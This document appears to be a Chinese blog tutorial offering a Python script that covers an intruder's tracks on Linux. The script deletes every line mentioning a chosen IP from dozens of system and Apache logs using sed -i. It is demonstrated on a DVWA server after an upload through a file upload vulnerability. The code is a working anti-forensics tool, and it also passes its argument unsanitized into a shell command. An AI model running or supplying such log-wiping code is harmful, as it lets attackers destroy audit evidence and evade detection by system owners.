Python安全小工具之Linux日志痕迹清除
主要过程为定义一个log列表,含有Linux中常见的log文件,然后使用os库的path.exists()方法查看是否存在该文件,若存在则使用subprocess库调用sed命令来删除日志中与指定host相关的行以实现痕迹的清除。
先来看看Linux中sed命令的使用:
其中‘/127.0.0.1/d’中,d是指定进行删除操作,删除的内容为含有“127.0.0.1”的行,而sed命令的-i参数表示可以直接修改文件内容。确实可以看到,含有“127.0.0.1”字样的行都被删除掉了。
脚本如下:
#coding=utf-8
import os
import sys
import subprocess
def Clear_The_Log(host):
logs = ["/var/log/messages","/var/log/messages.1","/etc/syslog.conf","/var/log/secure","/var/log/message","/var/log/lastlog","/var/log/auth.log","/var/log/vsftpd.log","/var/log/apache2/access.log","/var/log/apache2/error.log","/var/log/apache2/error.log.1","/usr/local/httpd/error.log","/apache/apache/message.log","/var/log/apache2/access_log","/var/log/apache2/error.log","/var/log/apache2/error_log ","/var/log/apache/access.log","/var/log/apache/access_log","/var/log/apache/error.log","/var/log/apache/error_log","/var/www/logs/error_log"," /var/www/logs/error.log"," /var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log"," /usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/usr/local/apache/logs/error_logerror_log.old","/usr/local/apache/logs/access_logaccess_log.old","/var/log/access.log","/var/log/access_log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access.log","/var/log/messages.1","/var/log/messages.2","/var/log/messages.3","/var/log/messages.4","/var/log/secure.1","/var/log/secure.2","/var/log/secure.3","/var/log/secure.3","/var/log/secure.4"]
print "[*]Trying to find the logs of the Linux......"
for log in logs:
if os.path.exists(log):
print "[+]Found the log: " + log
subprocess.call("sed -i '/%s/d' %s" % (host, log), shell=True)
print "[+]Clear the log successfully."
def main():
try:
host = sys.argv[1]
if len(sys.argv) < 1:
print "[*]Usage: python Linux_log_clear.py [host]\n Example: python Linux_log_clear.py 127.0.0.1"
Clear_The_Log(host)
except Exception, e:
print "[*]Usage: python Linux_log_clear.py [host]\n Example: python Linux_log_clear.py 127.0.0.1"
if __name__ == '__main__':
main()先在BT5上测试:
接着到DVWA的Web服务器上测试:
查看DVWA的Apache的access.log日志,找到物理机访问的记录:
命令:vim /var/log/apache2/access.log
然后使用输入该vim指令查找即可:/192.168.220.1
可以看到物理机即192.168.220.1的Web访问记录。
接着上传脚本,如可借用文件上传漏洞,然后执行脚本:
可以看到,脚本找到了Apache的access.log日志并对其进行了清除。
接下来进行确认,同样是查看Apache的access.log日志文件:
vim /var/log/apache2/access.log
可以看到,找不到相关的信息,确实清除掉了192.168.220.1主机相应的Web访问记录,即日志痕迹清除成功。